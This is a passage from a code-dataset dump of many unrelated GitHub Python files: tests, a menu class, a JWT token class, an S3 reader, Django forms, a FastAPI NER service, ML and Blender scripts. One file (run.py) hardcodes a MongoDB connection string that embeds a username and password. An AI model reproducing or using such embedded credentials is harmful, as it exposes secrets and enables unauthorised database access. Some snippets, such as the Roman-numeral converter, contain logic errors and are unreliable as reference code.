);\n\n","repo_name":"hungarian-notation/lua-game-old","sub_path":"LuaGame/buildscripts/auxiliaries.py","file_name":"auxiliaries.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35373452256","text":"class Menu():\n def __init__(self):\n self.menu = [\n {\"dish\": \"Margarita\", \"price\": 14.99, \"category\": \"main\", \"quantity\": 0},\n {\"dish\": \"Four Cheese\", \"price\": 15.99, \"category\": \"main\", \"quantity\": 0},\n {\"dish\": \"Hawaiian\", \"price\": 16.99, \"category\": \"main\", \"quantity\": 0},\n {\"dish\": \"Meat Feast\", \"price\": 17.99, \"category\": \"main\", \"quantity\": 0},\n {\"dish\": \"Chicken Tikka\", \"price\": 18.99, \"category\": \"main\", \"quantity\": 0},\n {\"dish\": \"Vegetarian\", \"price\": 19.99, \"category\": \"main\", \"quantity\": 0},\n {\"dish\": \"Special\", \"price\": 20.99, \"category\": \"main\", \"quantity\": 0},\n\n {\"dish\": \"Chips\", \"price\": 4.99, \"category\": \"side\", \"quantity\": 0},\n {\"dish\": \"Salad\", \"price\": 8.99, \"category\": \"side\", \"quantity\": 0},\n {\"dish\": \"Sauces\", \"price\": 5.99, \"category\": \"side\", \"quantity\": 0},\n\n {\"dish\": \"Ice cream\", \"price\": 4.99, \"category\": \"dessert\", \"quantity\": 0},\n {\"dish\": \"Chocolate cake\", \"price\": 3.99, \"category\": \"dessert\", \"quantity\": 0},\n {\"dish\": \"Apple pie\", \"price\": 7.99, \"category\": \"dessert\", \"quantity\": 0},\n\n {\"dish\": \"Coca cola\", \"price\": 19.99, \"category\": \"drink\", \"quantity\": 0},\n {\"dish\": \"Water\", \"price\": 19.99, \"category\": \"drink\", \"quantity\": 0},\n {\"dish\": \"Orange juice\", \"price\": 19.99, \"category\": \"drink\", \"quantity\": 0}\n]\n\n # formatted view of Menu \n def menu_view(self):\n mains = [f\"{dish['dish']} | {dish['price']}\\n\" for dish in self.menu if dish[\"category\"] == \"main\"]\n sides = [f\"{dish['dish']} | {dish['price']}\\n\" for dish in self.menu if dish[\"category\"] == \"side\"]\n desserts = [f\"{dish['dish']} | {dish['price']}\\n\" for dish in self.menu if dish[\"category\"] == \"dessert\"]\n drinks = [f\"{dish['dish']} | {dish['price']}\\n\" for dish in self.menu if dish[\"category\"] == \"drink\"]\n return f\"*** MENU ***\\nMAINS:\\n{''.join(mains)}\\nSIDES:\\n{''.join(sides)}\\nDESSERTS:\\n{''.join(desserts)}\\nDRINKS:\\n{''.join(drinks)}\"\n \n # returns menu lits of dictionaries\n def menu_objects(self):\n return self.menu\n\n","repo_name":"xAmiBa/Takeaway_app","sub_path":"lib/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8643468238","text":"from db.models import TaxModel, DiscountModel\nimport unittest\nfrom app import app\n\nTaxModel.get_tax = lambda region: 3\nDiscountModel.get_discount = lambda cost: 5\n\nclass FlaskTest(unittest.TestCase):\n def test_not_allowed(self):\n response = app.test_client().get('/api/v1/calculate')\n self.assertEqual(response.status_code, 405)\n\n def test_empty_body(self):\n response = app.test_client().post('/api/v1/calculate')\n self.assertEqual(response.status_code, 400)\n\n def test_success(self):\n response = app.test_client().post('/api/v1/calculate', json={ \"amount\":1, \"cost\": 1000, \"region\": \"NV\"})\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json, {'discount': 5.0, 'discounted_cost': 950.0, 'tax': 3.0, 'total_cost': 978.5})\n\n def test_failed(self):\n response = app.test_client().post('/api/v1/calculate', json={ \"amount\":1, \"cost\": \"dfgdfg\", \"region\": \"NV\"})\n self.assertEqual(response.status_code, 400)\n\n \nif __name__ == '__main__':\n unittest.main()","repo_name":"dtxth/gatech","sub_path":"services/restapi/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22886770931","text":"class Solution:\n def romanToDecimal(self, S): \n m=0\n d={'I':1,'V':5,'X':10,'L':50,'C':100,'D':500,'M':1000}\n for i in S:\n m+=d[i]\n if 'IV' in S or 'IX' in S:\n m=m-2\n if 'XL' in S or 'XC' in S:\n m=m-20\n if 'CD' in S or 'CM' in S:\n m=m-200\n return m\n","repo_name":"Lalith3470/GeeksforGeeks","sub_path":"Roman Number to Integer.py","file_name":"Roman Number to Integer.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"11955985520","text":"\"\"\"\n Florgon API session token implementation.\n\"\"\"\n\nfrom .base_token import BaseToken\n\n\nclass SessionToken(BaseToken):\n \"\"\"\n Session token JWT implementation.\n\n Used to issue new access tokens.\n Root token for Florgon core authorization process.\n Linked with session.\n \"\"\"\n\n _type = \"session\"\n\n # Custom payload fields.\n _session_id: int = None\n\n def get_session_id(self) -> int:\n \"\"\"Returns session ID from the session token.\"\"\"\n return self._session_id # pylint: disable=protected-access\n\n def __init__(\n self,\n issuer: str,\n ttl: int | float,\n user_id: int,\n session_id: int | None = None,\n payload: dict | None = None,\n *,\n key: str | None = None\n ):\n super().__init__(issuer, ttl, subject=user_id, payload={}, key=key)\n self._session_id = session_id # pylint: disable=protected-access\n\n @classmethod\n def decode(cls, token: str, key: str | None = None):\n \"\"\"\n Decoding with custom payload fields.\n \"\"\"\n instance = super(SessionToken, cls).decode(token, key)\n\n session_id = instance._raw_payload[\"sid\"] # pylint: disable=protected-access\n instance._session_id = session_id # pylint: disable=protected-access\n return instance\n\n def encode(self, *, key: str | None = None) -> str:\n \"\"\"\n Encodes token with custom payload fields.\n \"\"\"\n self.custom_payload[\"sid\"] = self._session_id\n return super().encode(key=key)\n","repo_name":"florgon/api","sub_path":"src/api/app/services/tokens/session_token.py","file_name":"session_token.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"31"} +{"seq_id":"42281703121","text":"# TASK 3: CREATE A FUNCTION THAT CAN READ ANY FILE FROM S3 BUCKET\n\nimport os\nimport io\nfrom io import StringIO\nimport yaml\nimport boto3\nimport botocore\nimport pandas as pd\nfrom dotenv import load_dotenv, find_dotenv\n\nload_dotenv(find_dotenv()) # Loads the .env file.\n\ndef read_s3_file(bucket_name, key, num_row = None):\n \"\"\"\n Reads a file from an S3 bucket and returns its contents as a string.\n These are the libraries required to use this function:\n boto3\n pandas\n python-dotenv\n\n \"\"\"\n try:\n s3 = boto3.client('s3',\n aws_access_key_id=os.getenv('ACCESS_KEY_ID'),\n aws_secret_access_key=os.getenv(\"SECRET_ACCESS_KEY\"))\n except botocore.exceptions.ClientError:\n exit(403)\n except botocore.exceptions.ClientError:\n print()\n obj = s3.get_object(Bucket=bucket_name, Key=key)\n #obj = s3.get_object(Bucket=bucket_name, Key=f\"{key}/{key}\")\n buffer = io.BytesIO()\n file_ext = key.split(\".\")[-1]\n if file_ext in [\"csv\", \"txt\"]:\n df = pd.read_csv(obj['Body'])\n if df.shape[0] == 0:\n exit(500)\n elif file_ext in [\"xls\", \"xlsx\"]:\n df = pd.read_excel(io.BytesIO(obj['Body'].read()))\n elif file_ext == \"json\":\n num_row = None\n df = pd.read_json(obj['Body']).to_dict()\n elif file_ext == \"parquet\":\n s3 = boto3.resource('s3',\n aws_access_key_id=os.getenv('ACCESS_KEY_ID'),\n aws_secret_access_key=os.getenv(\"SECRET_ACCESS_KEY\"))\n object = s3.Object(bucket_name=bucket_name, key=key)\n object.download_fileobj(buffer)\n df = pd.read_parquet(buffer)\n elif file_ext in [\"yaml\", \"yml\"]:\n df = yaml.safe_load(obj[\"Body\"])\n\n else:\n print(f\"{file_ext} can not be handled\")\n exit(500)\n\n if num_row:\n return df.head(num_row)\n return df ## End of function\n\n#\n#\n# bucket_name = \"uk-naija-datascience-21032023\"\n# key = \"Folder1/Folder2/gdp-countries.parquet\" #this meane the folder path to the file\n#\n#\n# file_contents = read_s3_file(bucket_name, key, 10)\n# print (file_contents)\n#\n# # sample files in S3 are:\n# # omolewa.csv\n# # ny_apartment_cost_list.csv\n# # myfile.txt\n# # season1.json\n# # hyp.scratch.yaml\n# # gdp-countries.parquet\n# # new-sales-sheet.xlsx - https://stackoverflow.com/questions/61723572/how-to-read-excel-file-from-aws-in-python-3/61723955#61723955?newreg=c9c4eb2ab84a4b5cb021bf7603b01c54\n# # how to read a parquet file - https://stackoverflow.com/questions/51027645/how-to-read-a-single-parquet-file-in-s3-into-pandas-dataframe-using-boto3\n\n\n\n\n\n","repo_name":"Aikezl/food_delivery_intelligence","sub_path":"copy_s3_file/s3-read.py","file_name":"s3-read.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74950795289","text":"\"\"\"\nStocks Advisor\n\"\"\"\n\nimport configs.alphaconf\nimport libs.stockslib as sl\nimport fire\nimport json\nimport os\nfrom pprint import pprint\n\n\nclass ADVISOR(object):\n \"\"\"Stocks Advisor\"\"\"\n\n def __init__(self, datatype='m'):\n self.key = configs.alphaconf.key\n\n self.datatype = datatype\n\n if self.datatype == 'm':\n self.watchdata = configs.alphaconf.symbols_m\n else:\n self.watchdata = configs.alphaconf.symbols\n\n self.tobuy = dict()\n self.tosell = dict()\n\n self.incomelimit = 5\n self.luck = 0.2\n\n def check_watchlist(self):\n \"\"\"Checks indicators\"\"\"\n\n for item in self.watchdata:\n\n # Parse watchlist\n if type(item) == dict:\n price = list(item.values())[0]\n symbol = list(item.keys())[0]\n else:\n symbol = item\n price = 0\n\n # print(symbol)\n\n # Init\n res = sl.RESOURCE(symbol=symbol, price_header='Close')\n if self.datatype == 'm':\n res.prices = res.get_prices_from_moex(cacheage=3600*12, days=200, cachedir=os.path.join('cache-m'))\n res.prices = res.prices.tail(200)\n else:\n res.get_prices_from_alpha(key=self.key, cacheage=3600*6)\n res.fix_alpha_columns()\n\n # res.get_history_from_alpha(key=self.key)\n # res.fix_alpha_history_columns()\n\n lastprice = res.get_last_price()\n\n buy = 0\n\n # FB Prophet\n # if res.get_prophet_prediction() > 30:\n # buy += 1\n\n # Check for anomaly\n res.is_anomaly()\n\n # Calculate strategies\n for strategy_name in configs.alphaconf.ratios.keys():\n try:\n if self.datatype == 'm':\n weight = configs.alphaconf.ratios_m[strategy_name][symbol]\n else:\n weight = configs.alphaconf.ratios[strategy_name][symbol]\n except:\n weight = 0\n strategy_method = getattr(res, strategy_name)\n try:\n rez = strategy_method()\n except:\n print(symbol, 'failed', strategy_method)\n rez = 0\n if rez > 0:\n buy += weight * rez\n else:\n buy += rez\n\n if buy > self.luck * len(configs.alphaconf.ratios.keys()):\n res.buy = buy\n self.tobuy[symbol] = [buy, lastprice, res.msg]\n\n if lastprice > price > 0:\n income = round((lastprice / price - 1) * 100, 1)\n if income > self.incomelimit:\n self.tosell[symbol] = [buy, income, res.msg]\n\n print('BUY:')\n print(json.dumps(self.tobuy, indent=4))\n print('SELL:')\n print(json.dumps(self.tosell, indent=4))\n\n\nif __name__ == \"__main__\":\n adv = ADVISOR(datatype='a')\n fire.Fire(adv.check_watchlist)\n","repo_name":"Iyamoto/stocksadvisor","sub_path":"old/advisor.py","file_name":"advisor.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37071229701","text":"import tensorflow as tf\nimport numpy as np\nimport joblib\nfrom rllab.sampler.utils import rollout, deterministic_rollout\nfrom rllab.envs.gym_env import GymEnv\nfrom sandbox.rocky.tf.envs.base import TfEnv\nfrom correct_overapprox import ReluProtector, build_multi_step_network, display_ops, write_to_tensorboard, write_metadata, collect_output_ops\nfrom tensorflow.python.framework import graph_util\nfrom NNet.scripts.pb2nnet import FFTF2W, pb2W\nimport parsing\n\n\n# Goal of script: parse 'xW' convention rllab (feedforward) policies into 'Wx' networks that I can then combine with dynamics easily\n\n# file = \"/Users/Chelsea/Dropbox/AAHAA/src/rllab/data/local/experiment/relu_small_network_vpg_capped_action_trying_simpler_dense_layer/params.pkl\"\n# # ^ the only policy file that works. ALSO...I think I messed up my rllab, trrying to change the weights.....so I have a bit to fix before I can make new policies again\n\nfile = \"/Users/Chelsea/Dropbox/AAHAA/src/rllab/data/local/experiment/relu_small_network_ppo_capped_action/params.pkl\"\n\nsim = False\n\n# load and simulate\nsess = tf.Session()\n# load policy\nwith sess.as_default():\n data = joblib.load(file)\n policy = data[\"policy\"]\n # can sim policy to test it! :DDD\n if sim:\n env = TfEnv(GymEnv(\"MyPendulum-v0\", record_video=False))\n path = deterministic_rollout(env, policy, max_path_length=500, animated=True, speedup=2, always_return_paths=True)\n print(\"reward: \", sum(path[\"rewards\"]))\n input(\"enter to continue\")\n\n\n# extract mean network only, make sure it looks ff\noutput_op_names = [\"policy/mean_network/output\"]\noutput_graph_def = graph_util.convert_variables_to_constants(\n sess, # sess used to retrieve weights\n sess.graph.as_graph_def(), # graph def used to retrieve nodes\n output_op_names # output node names used to select useful nodes\n )\n# print op list to make sure its only stuff we can handle\nprint(\"op set: \", {(x.op,) for x in output_graph_def.node})\n# turn graph def back into graph\ntf.import_graph_def(output_graph_def)\n\n\n# write to tensorboard\nf_id = str(int(np.round(np.random.rand()*5000)))\nLOGDIR = \"/Users/Chelsea/Dropbox/AAHAA/src/OverApprox/tensorboard_logs/looking_at_old_controller_\"+f_id\nwrite_to_tensorboard(LOGDIR, sess)\n# next run at command line, e.g.: tensorboard --logdir=/Users/Chelsea/Dropbox/AAHAA/src/OverApprox/tensorboard_logs/looking_at_old_controller_4909\n\n\n# save as .pb\noutput_graph_name = \"/Users/Chelsea/Dropbox/AAHAA/src/OverApprox/nnet_files/bad_relu_rllab_controller_graph_def_\"+f_id+\".pb\"\nwith tf.gfile.GFile(output_graph_name, \"w\") as f:\n f.write(output_graph_def.SerializeToString())\n print(\"%d ops in the final graph.\" % len(output_graph_def.node)) \n\n# get out weights and biases for turning back into a tf network\nweights, biases = pb2W(output_graph_name, inputName=\"policy/mean_network/input/input\", outputName=output_op_names[0])\n# have to transpose because we're coming from rllab\nweights = [w.transpose() for w in weights]\n# NOTE: only doing this next step like this because I am using a network that has 'expand dims' in it, and thus I pick out the 1D biases from rllab\nbiases = [np.array([b]).transpose() for b in biases]\n\n# turn back into a tf network\nff_input = tf.placeholder(tf.float32, shape=(2,1), name=\"state0\")\nffnet = parsing.create_tf_network(weights,biases,inputs=ff_input, activation=tf.nn.relu, act_type='Relu', output_activated=False)\n\n# evaluate to make sure that the networks are the same\nrllab_input = tf.placeholder(tf.float32, shape=(1,2), name=\"rllab_inputs\")\ntest_input_xW = np.random.rand(1,2)*2-1\ntest_input_Wx = test_input_xW.transpose()\nrllab_output_tensor = tf.get_default_graph().get_operation_by_name(output_op_names[0]).outputs[0]\nrllab_output = sess.run([rllab_output_tensor], feed_dict={\"policy/mean_network/input/input:0\": test_input_xW})\nffnet_output = sess.run([ffnet], feed_dict={ff_input: test_input_Wx})\n\nassert all(rllab_output[0] - ffnet_output[0]<1e-3)\nprint(\"tests pass!\") \n\n\n# write to file as .nnet or .pb !!\n\n\n\n","repo_name":"chelseas/OVERT","sub_path":"depreciated/Pre_Amir_files/testing_policy_parsing.py","file_name":"testing_policy_parsing.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73796512728","text":"from django.forms import ModelForm\nfrom webapp.models import Group, Student\n\n\nclass GroupForm(ModelForm):\n\n class Meta:\n model = Group\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(GroupForm, self).__init__(*args, **kwargs)\n self.fields['name'].widget.attrs = {\n 'class': 'form-control',\n 'placeholder': 'Group name'\n }\n self.fields['head'].widget.attrs = {\n 'class': 'form-control',\n }\n\n # article = Article.objects.get(pk=1)\n # form = ArticleForm(instance=article)\n\n self.fields['head'].queryset = Student.objects.filter(group=self.instance)\n # self.fields['head'].queryset = group.student_set.all()\n\n\nclass StudentForm(ModelForm):\n\n class Meta:\n model = Student\n fields = [\n 'first_name',\n 'last_name',\n 'group',\n 'brd_date',\n 'ticket'\n ]\n\n def __init__(self, *args, **kwargs):\n super(StudentForm, self).__init__(*args, **kwargs)\n self.fields['first_name'].widget.attrs = {\n 'class': 'form-control',\n 'placeholder': 'First name'\n }\n self.fields['last_name'].widget.attrs = {\n 'class': 'form-control',\n 'placeholder': 'Last name'\n }\n self.fields['group'].required = False\n self.fields['group'].empty_label = None\n self.fields['group'].widget.attrs = {\n 'class': 'form-control'\n }\n self.fields['brd_date'].widget.attrs = {\n 'class': 'form-control',\n 'placeholder': 'Date of birth',\n }\n self.fields['ticket'].widget.attrs = {\n 'class': 'form-control',\n 'placeholder': 'Ticket number'\n }\n","repo_name":"dimdiden/Student","sub_path":"webapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11955998882","text":"\"\"\" Cart module test cases \"\"\"\nfrom typing import List\n\nimport pytest\n\nfrom lecture.shop.cart import Cart\nfrom lecture.shop.products import Product\n\nproduct1 = Product(\n product_id=1,\n title='Hello',\n price=10.0\n)\n\nproduct2 = Product(\n product_id=2,\n title='Hello2',\n price=100.0\n)\n\n\n\n\n@pytest.fixture()\ndef db():\n \"\"\" PRE TEST \"\"\"\n # INITIALIZE DB. FRESH. SEED WITH OBJECT\n yield\n \"\"\" POST TEST \"\"\"\n # CLEAN DB\n\n\ndef test_add_to_cart():\n cart = Cart()\n product = Product(\n product_id=1,\n title='Hello',\n price=10.0\n )\n\n cart.add_to_cart(product)\n\n assert [product] == cart.get_products()\n\n\n@pytest.mark.parametrize(\n 'product_to_add, product_to_remove, result',\n [\n (product2, product2, []),\n (product1, product2, [product1]),\n ]\n)\ndef test_remove_product(\n cart: Cart,\n product_to_add: Product,\n product_to_remove: Product,\n result: List[Product]\n):\n cart.add_to_cart(product_to_add)\n cart.remove_from_cart(product_to_remove)\n\n assert result == cart.get_products()\n\n@pytest.mark.parametrize(\n 'number',\n [\n '123456789012',\n '123456789011',\n ]\n)\ndef test_number_valid(cart: Cart, number: str):\n assert cart.is_phone_number(number)\n\n\n@pytest.mark.parametrize(\n 'number',\n [\n '12345678901',\n '1234567890123',\n '1234567890A2',\n '1234567890#2',\n ]\n)\ndef test_number_invalid(db, cart: Cart, number: str):\n assert not cart.is_phone_number(number)\n","repo_name":"kyryloprogs/Hometask_Testing","sub_path":"lecture/tests/test_cart.py","file_name":"test_cart.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16523331056","text":"# -*- coding: utf-8 -*-\n# @Time : 04/11/2022 10:31\n# @File : app.py\nfrom typing import Optional\n\nfrom fastapi import FastAPI, Query, Path, HTTPException\nfrom flair.data import Sentence\n\nfrom src.class_type import NerInput, NerOutput\nfrom src.model import load_models\nfrom src.utils import parse_result_flair_ner, anonymize_text_flair_ner\n\napp_api = FastAPI()\nmodels = load_models()\n\n\n@app_api.get(\"/\")\nasync def root():\n return {\"message\": \"Hello World\"}\n\n\n@app_api.post(\"/ner\", response_model=NerOutput)\nasync def apply_ner(user_input: NerInput):\n text = user_input.text\n lang = user_input.language\n\n if lang in [\"fr\", \"en\"]:\n # make sentence\n sentence = Sentence(text)\n # predict NER tags\n models[lang].predict(sentence)\n\n # parse results\n results = parse_result_flair_ner(sentence)\n anonymize_text = anonymize_text_flair_ner(text, sentence)\n\n return {\n \"entities\": results,\n \"anonymize_text\": anonymize_text\n }\n\n else:\n raise HTTPException(status_code=404,\n detail=f\"Use lang 'en' or 'fr' not {lang}\")\n","repo_name":"enzorc/demo-ner-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2902881983","text":"import bpy\nfrom .nodes_from_context import nodes_from_context\n\ndef slot_node_from_context(name, context):\n # type: (bpy.Optional[str], bpy.ContextType) -> bpy.Optional[bpy.Tuple[bpy.SlotNodeType, bpy.types.Nodes]]\n if name is None:\n return\n nodes = nodes_from_context(context)\n if nodes is None:\n return\n if name not in nodes:\n return\n node = nodes[name]\n if node.bl_idname != \"SlotNode\":\n return\n return (node, nodes)\n","repo_name":"mmulet/font-game-engine","sub_path":"blender/fontemon_blender_addon/SceneTreeEditor/slot_node_from_context.py","file_name":"slot_node_from_context.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"31"} +{"seq_id":"9542603516","text":"dictCadastro = dict()\ngalera = []\nmedia = soma = 0\nwhile True:\n dictCadastro.clear()\n dictCadastro[\"nome\"] = input(\"Nome: \").strip()\n dictCadastro[\"sexo\"] = input(\"Sexo: [M/F] \" ).strip()[0]\n while dictCadastro[\"sexo\"] not in \"MmFf\":\n print(\"ERRO! Por favor, digite apenas M ou F \")\n dictCadastro[\"sexo\"] = input(\"Sexo [M/F] \")\n dictCadastro[\"idade\"] = int(input(\"Idade: \"))\n soma += dictCadastro[\"idade\"]\n galera.append(dictCadastro.copy())\n resp = input(\"Quer continuar? [S/N] \").strip()\n while resp not in \"sSnN\":\n print(\"ERRO! Responda apenas S ou N\")\n resp = input(\"Quer continuar? [S/N] \")\n if resp in \"nN\":\n break \nprint(f\"Ha ao todo {len(galera)} pessoas cadastradas\")\nmedia = soma / len(galera)\nprint(f\"A media de idade e de {media:5.2f} anos\")\nprint(\"As mulheres cadastradas foram \", end = \"\")\nfor p in galera:\n if p[\"sexo\"] in \"fF\":\n print(f'{p[\"nome\"]}', end= \"\")\nfor p in galera:\n if p[\"idade\"] >= media:\n print(\" \")\n for k, v in p.items():\n print(f'{k} = {v} ', end = '')\n print()\nprint(\"ENCERRADO\")\n","repo_name":"AbelRapha/Python-Exercicios-CeV","sub_path":"Mundo 3/ex094 Unindo Dicionarios e Listas.py","file_name":"ex094 Unindo Dicionarios e Listas.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31005188067","text":"from django.contrib import admin\nfrom django.urls import path\n\nfrom myapp.views import *\n\napp_name = \"myapp\"\n\nurlpatterns = [\n path('register/',registerView,name=\"reg\"),\n path('success/',success_view,name=\"suc\"),\n path('goa///', go_a),\n path('handle///',handler_a,name='handle'),\n]\n","repo_name":"SpCrazy/crazy","sub_path":"code/djangoDay3/myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27678537695","text":"from app import create_app\nfrom flask_pymongo import PyMongo\nfrom flask import Flask\napp = create_app()\nmongodb_client = PyMongo(app, uri=\"mongodb+srv://new:abcd1234@cluster0.sm1gh.mongodb.net/newd?retryWrites=true&w=majority\")\ndb = mongodb_client.db\n\n\n@app.route(\"/add_one\")\ndef add_one():\n user = mongodb_client.db.job\n user.insert_one({'title': \"todo title\", 'body': \"todo body\"})\n return \"ok\"\n\nif __name__ == '__main__': \n app.run(debug=True)\n ","repo_name":"unboxdisease/webhook-repo","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4051323594","text":"import argparse\nimport numpy as np\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import accuracy_score\nfrom torch import load\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--k', type=int, default=3)\n args = parser.parse_args()\n print('Loading training data...')\n metadata = load('train-vq-vae-embeddings.pt')\n data_train = metadata['vq_embeddings'].reshape(-1, 64*8*8)\n print('X:', data_train.shape)\n targets_train = metadata['targets']\n print('y:', len(targets_train))\n\n print('Fitting classifier to training data...')\n clf = KNeighborsClassifier(n_neighbors=args.k)\n clf.fit(data_train, targets_train)\n\n train_score = clf.score(data_train, targets_train)\n print('Train Accuracy:', train_score)\n print('\\nLoading validation data...')\n metadata = load('val-vq-vae-embeddings.pt')\n data_val = metadata['vq_embeddings'].reshape(-1, 64*8*8)\n print('X_val:', data_val.shape)\n targets_val = metadata['targets']\n val_score = clf.score(data_val, targets_val)\n\n\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"anican/generalization","sub_path":"experiments/vae/knn_graph.py","file_name":"knn_graph.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70090710168","text":"\"\"\"Texture conversion utility for Khukuri project\n\nThis little utility creates combined textures from exported baked materials by\nthe UE4 material baking process. Instead of using a separate texture for each\nmap like roughness, metalness, AO or specular, bake these into color channels\nto save textures. The resulting textures can be reimported into the UE4 Editor\nand used with a very simple material.\n\nThis is a special case for the Khukuri project made for the Unreal Engine\nMarketplace, but feel free to modify for any purpose.\n\n+-------------------------+----------+-----------+----------+----+----------+\n| Knife variant | diffuse | roughness | metallic | AO | specular |\n| | + normal | | | | |\n+-------------------------+----------+-----------+----------+----+----------+\n| Solo knife | X | G | B | - | R(*) |\n| Solo silver sheath | X | G | B | - | - |\n| Solo leather sheath | X | G | B | R | - |\n| Knife in silver sheath | X | G | B | - | - |\n| Knife in leather sheath | X | G | B | R | - |\n+-------------------------+----------+-----------+----------+----+----------+\n\nExport the textures from UE4 after they are created by material baking.\nDiffuse and Normal are just converted to PNG without any further processing.\nAll others are joined by this script. Above table shows, which maps are\nrequired for which mesh and which color channels are used.\n\nFor the knives with sheath combinations, 2 separate materials are baked. The\noriginal approach to join these as well into one single texture using a mask\nto have only one draw call has been dropped (problems with normal maps :)\n\n(*) specular is used for the solo knives blood only - only export if needed\n\nThe naming of UE4 exported files is as follows (example for diffuse texture)\n\nT_M_SM_Knife1_MI_Knife1_E22686584D98CA622DF16A8552089CC3_BaseColor.TGA\n---|---01----|---02----|---------------03---------------|---04----\n \nThe interesting 4 parts have been marked:\n01: Mesh name used for baking in UE4\n02: Material instance name. Needs MI_ prefix and must contain keywords \n that can be detected by the script: Leather, Silver, Knife, Grip\n03: GUID generated by UE4 Mesh Editor during bake\n04: Type of exported texture as string, as selected during bake: \n BaseColor, Normal, Metallic, Roughness, AmbientOcclusion or Specular\n \nIMPORTANT: Export has to be done in 2K for all textures. \n\"\"\"\n\nimport os\nimport sys\nimport re\nfrom PIL import Image\n\n__author__ = \"Herbert Mehlhose\"\n__copyright__ = \"Copyright 2020, Herbert Mehlhose\"\n#__credits__ = []\n__license__ = \"CC0\"\n__version__ = \"1.0\"\n__maintainer__ = \"Herbert Mehlhose\"\n__email__ = \"\"\n__status__ = \"Final\"\n\n# My dictionary class\nclass hfcmDict(dict):\n def __missing__(self, key):\n value = self[key] = type(self)()\n return value \n \n# Subdirectory to drop in exported textures from UE4 and destination of PNGs\nimagesDir = 'Work'\n\n# Texture size\ntexsize = 2048\n \n# Keywords to be included in material instance names to recognize function\nmatkeywords = ('Leather', 'Silver', 'Knife', 'Grip')\n\nsuffixes = {'BaseColor': 'D',\n 'Normal': 'N',\n 'Metallic': 'M',\n 'Roughness': 'R',\n 'AmbientOcclusion': 'O', \n 'Specular': 'S'}\n\nimages = hfcmDict()\nmeshes = hfcmDict()\n\ndirectory = os.getcwd() + '/' + imagesDir\n\n_R_ = re.compile('^T_M_(?P.+)'\n '(?P_MI_.+)_'\n '(?P[0-9A-F]{32})_'\n '(?P.+)')\n\nfor file in os.listdir(directory):\n filename = os.fsdecode(file)\n if filename.endswith(\".TGA\"):\n (filenameonly, filetype) = os.path.splitext(filename)\n Match = _R_.match(filenameonly)\n mesh = Match.group('MESH')\n matinst = Match.group('MATINST')\n guid = Match.group('GUID')\n key = matinst + '_' + guid\n if any(matkeyword in matinst for matkeyword in matkeywords):\n images[key][Match.group('TEXTYPE')] = imagesDir + '/' + filename\n meshes[key] = mesh\n else:\n print(\"WARNING - no matching keyword found in TGA texture file\")\n continue\n else:\n continue\n\nfor texkey in images.keys():\n print(\"\\nProcessing Texture %s\" % texkey)\n mixsuffix = ''\n for imgtype in images[texkey].keys():\n print(\"Processing %s (%s)\" % (images[texkey][imgtype],imgtype))\n try:\n imbase = Image.open(images[texkey][imgtype])\n except:\n print(\"Could not open image '%s'\" % images[texkey][imgtype])\n sys.exit(1)\n # Resize image - e.g. roughness might be 1x1 only on export, if all\n # values are identical (optimization by UE4 baking process)\n width, height = imbase.size\n if width == 1:\n print(\"Resizing %s - %s\" % (texkey, imgtype))\n imbase = imbase.resize((texsize, texsize))\n # Diffuse and Normal are just saved to PNG without processing\n if imgtype == 'BaseColor' or imgtype == 'Normal':\n outfile = '{:s}/T_{:s}{:s}_{:s}.png'.format(imagesDir,\n meshes[texkey],\n texkey,\n suffixes[imgtype])\n print(\"Saving %s to %s\" % (imgtype,outfile))\n imbase.save(outfile)\n continue\n # All others are processed to be combined into a single texture map\n mixsuffix += suffixes[imgtype]\n if imgtype == 'Roughness':\n RR, RG, RB = imbase.split()\n elif imgtype == 'Metallic':\n MR, MG, MB = imbase.split()\n # Share red channel used for AO on leather sheath for specular on\n # solo knife, where it is used for blood\n elif imgtype == 'AmbientOcclusion' or imgtype == 'Specular':\n OR, OG, OB = imbase.split()\n else:\n print(\"Cannot handle image type 